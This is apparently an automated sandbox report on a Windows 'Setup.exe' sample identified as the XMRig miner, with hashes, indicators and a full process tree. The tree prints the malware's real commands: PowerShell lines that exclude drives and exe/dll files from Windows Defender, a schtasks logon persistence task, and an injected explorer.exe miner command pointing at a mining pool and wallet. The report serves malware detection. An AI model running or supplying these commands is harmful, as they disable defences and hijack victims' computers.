xmrig | 643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b

Analysis

max time kernel
147s
max time network
147s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21/12/2024, 17:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Setup.exe
Size

29.8MB
MD5

f39a0615ad5482c3ffd8f46baeac3ac3
SHA1

e4cd77ab330f734e7a5253c07c559e8c92d88c35
SHA256

643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b
SHA512

fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481
SSDEEP

786432:PkvEnDem3vOYqVx9BvEiI8hXcclLOhiKw+HSD:svEn6mfN4xvcehFs7SD

Score

10^/10

xmrig execution miner

Malware Config

Signatures

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 17 IoCs

miner

resource	yara_rule
behavioral1/memory/1160-70-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-61-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-71-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-67-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-65-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-63-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-59-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-57-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-55-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-53-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-51-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-80-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-83-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-82-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-81-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-79-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/1160-84-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1708	powershell.exe
2388	powershell.exe
2100	powershell.exe
1356	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2648	services64.exe
888	sihost64.exe

Loads dropped DLL 4 IoCs

pid	Process
332	cmd.exe
332	cmd.exe
1640	conhost.exe
1640	conhost.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1640 set thread context of 1160	1640	conhost.exe	48

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2196	schtasks.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

pid	Process
2836	conhost.exe
1708	powershell.exe
2388	powershell.exe
1640	conhost.exe
1640	conhost.exe
2100	powershell.exe
1356	powershell.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe
1160	explorer.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	conhost.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	1640	conhost.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeLockMemoryPrivilege	1160	explorer.exe
Token: SeLockMemoryPrivilege	1160	explorer.exe
Token: SeDebugPrivilege	1356	powershell.exe

Suspicious use of WriteProcessMemory 61 IoCs

description	pid	Process	procid_target
PID 2892 wrote to memory of 2836	2892	Setup.exe	30
PID 2892 wrote to memory of 2836	2892	Setup.exe	30
PID 2892 wrote to memory of 2836	2892	Setup.exe	30
PID 2892 wrote to memory of 2836	2892	Setup.exe	30
PID 2836 wrote to memory of 2696	2836	conhost.exe	31
PID 2836 wrote to memory of 2696	2836	conhost.exe	31
PID 2836 wrote to memory of 2696	2836	conhost.exe	31
PID 2696 wrote to memory of 1708	2696	cmd.exe	33
PID 2696 wrote to memory of 1708	2696	cmd.exe	33
PID 2696 wrote to memory of 1708	2696	cmd.exe	33
PID 2836 wrote to memory of 2644	2836	conhost.exe	35
PID 2836 wrote to memory of 2644	2836	conhost.exe	35
PID 2836 wrote to memory of 2644	2836	conhost.exe	35
PID 2644 wrote to memory of 2196	2644	cmd.exe	37
PID 2644 wrote to memory of 2196	2644	cmd.exe	37
PID 2644 wrote to memory of 2196	2644	cmd.exe	37
PID 2696 wrote to memory of 2388	2696	cmd.exe	38
PID 2696 wrote to memory of 2388	2696	cmd.exe	38
PID 2696 wrote to memory of 2388	2696	cmd.exe	38
PID 2836 wrote to memory of 332	2836	conhost.exe	40
PID 2836 wrote to memory of 332	2836	conhost.exe	40
PID 2836 wrote to memory of 332	2836	conhost.exe	40
PID 332 wrote to memory of 2648	332	cmd.exe	42
PID 332 wrote to memory of 2648	332	cmd.exe	42
PID 332 wrote to memory of 2648	332	cmd.exe	42
PID 2648 wrote to memory of 1640	2648	services64.exe	43
PID 2648 wrote to memory of 1640	2648	services64.exe	43
PID 2648 wrote to memory of 1640	2648	services64.exe	43
PID 2648 wrote to memory of 1640	2648	services64.exe	43
PID 1640 wrote to memory of 1268	1640	conhost.exe	44
PID 1640 wrote to memory of 1268	1640	conhost.exe	44
PID 1640 wrote to memory of 1268	1640	conhost.exe	44
PID 1268 wrote to memory of 2100	1268	cmd.exe	46
PID 1268 wrote to memory of 2100	1268	cmd.exe	46
PID 1268 wrote to memory of 2100	1268	cmd.exe	46
PID 1640 wrote to memory of 888	1640	conhost.exe	47
PID 1640 wrote to memory of 888	1640	conhost.exe	47
PID 1640 wrote to memory of 888	1640	conhost.exe	47
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1268 wrote to memory of 1356	1268	cmd.exe	49
PID 1268 wrote to memory of 1356	1268	cmd.exe	49
PID 1268 wrote to memory of 1356	1268	cmd.exe	49
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 1640 wrote to memory of 1160	1640	conhost.exe	48
PID 888 wrote to memory of 2552	888	sihost64.exe	50
PID 888 wrote to memory of 2552	888	sihost64.exe	50
PID 888 wrote to memory of 2552	888	sihost64.exe	50
PID 888 wrote to memory of 2552	888	sihost64.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2892
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2388
- - C:\Windows\System32\cmd.exe
    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2644
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2196
- - C:\Windows\System32\cmd.exe
    "cmd" cmd /c "C:\Windows\system32\services64.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:332
  - - C:\Windows\system32\services64.exe
      C:\Windows\system32\services64.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2648
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
        5⤵
        Loads dropped DLL
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1640
      - C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
      - C:\Windows\system32\Microsoft\Libs\sihost64.exe
        
        "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:888
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        7⤵
        
        PID:2552
      - C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=44uwibUE5EF8oiYGZWhDJ6YxTYoL8YgzyYw5ofRojJrtZydAndawV157eimKXonkgsi8ZNdvRq22xC6dmxwmq2tpQ4nTUDe --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
262784f25b190924cea780f07e738588

SHA1
9dd63aa2d8ba90fd9279da02473fddc56c8442cc

SHA256
6620dae426ec60c8dd54c7aa846a416555a982d8464b5feac7fe436ded8aaa99

SHA512
2a80a69d2ba321f9242b7d54c2c68004859462d7d127a6da706e3250e8e2260dbfcd356cf40111bfb33bdbd0ea4824ac01f49a0fd3435dc30bd9ee37bad9962a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
65edb2aa612c29bcf0f09739e9d75bfb

SHA1
15b6106b8a9027bdc49b0e0fe61c35c3e85f2f7b

SHA256
f6408b15521dd06be79298965f00fec4a39691504f91caa04800d2e98b668ba6

SHA512
76e1b4aea5a1bb3be2f0298dbc630965aa21e358d2b9cd2a3e9bd6fd76509eec3b48b1b0da918ce0feef35ffe796e712b1179ad0986e0cd4cd8e1d975d69c004

Download Submit
C:\Windows\System32\Microsoft\Libs\sihost64.exe

Filesize
32KB

MD5
554b19e8d2cd3728ec5557c08cd2151b

SHA1
7f22b80a8b3a141a93735f4423fda76f914dd92c

SHA256
53b161d512a4cc0e7ad58be8bb5155e37399afe56cd7df38e9f0c4f09bb1cf56

SHA512
46103c9ffb4483107ad0f5b91aba14464747a75a058d2610714f7155e0c014b094de0fb7f40d1515a008f70763131a4b7964d739a2e4381ac38a47755f6938a0

Download Submit
\Windows\System32\services64.exe

Filesize
29.8MB

MD5
f39a0615ad5482c3ffd8f46baeac3ac3

SHA1
e4cd77ab330f734e7a5253c07c559e8c92d88c35

SHA256
643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b

SHA512
fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481

Download Submit
memory/1160-57-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-53-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-84-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-79-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-81-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-82-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-83-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-80-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-51-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-71-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-70-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-55-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-59-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-45-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-47-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-49-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-63-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-69-0x000007FFFFFD4000-0x000007FFFFFD5000-memory.dmp

Filesize
4KB

Download
memory/1160-65-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-61-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-67-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/1160-73-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/1708-13-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/1708-12-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2388-20-0x0000000002720000-0x0000000002728000-memory.dmp

Filesize
32KB

Download
memory/2388-19-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2552-86-0x00000000001E0000-0x00000000001E6000-memory.dmp

Filesize
24KB

Download
memory/2552-85-0x00000000000A0000-0x00000000000A7000-memory.dmp

Filesize
28KB

Download
memory/2836-21-0x000007FEF59E3000-0x000007FEF59E4000-memory.dmp

Filesize
4KB

Download
memory/2836-22-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-4-0x0000000020640000-0x00000000223FE000-memory.dmp

Filesize
29.7MB

Download
memory/2836-3-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-5-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-2-0x000007FEF59E3000-0x000007FEF59E4000-memory.dmp

Filesize
4KB

Download
memory/2836-6-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-29-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

Filesize
9.9MB

Download
memory/2836-1-0x0000000000250000-0x000000000200F000-memory.dmp

Filesize
29.7MB

Download